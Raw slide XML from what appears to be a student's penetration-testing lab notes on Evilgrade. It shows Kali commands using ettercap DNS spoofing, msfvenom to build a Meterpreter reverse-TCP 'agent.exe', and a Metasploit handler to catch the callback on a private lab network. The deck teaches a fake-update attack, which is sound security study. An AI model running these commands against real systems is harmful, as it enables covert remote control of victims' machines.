                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Plugin name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quit): dns_spoof</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2115820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Installation -</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Evilgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1130553"/>
            <a:ext cx="7865745" cy="4830445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.248.134) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>terminal:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># cd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/usr/share/isr-evilgrade/agent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
                <a:tab pos="1975485" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># msfvenom -p windows/meterpreter/reverse_tcp  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LHOST=192.168.248.134 LPORT=8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-f exe --platform  windows	&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>agent.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># service postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
                <a:tab pos="1061085" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#	msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="2868930" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit(handler) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload  windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit(handler) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>set LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit(handler) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>set LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.248.132</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 1</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This is my day one notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is filled with terms that I had never heard of.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I will try to explain some</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2971800"/>
            <a:ext cx="6771286" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969485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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2115820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Installation -</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Evilgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1130553"/>
            <a:ext cx="7807959" cy="4830445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In a new terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># cd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/usr/bin</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
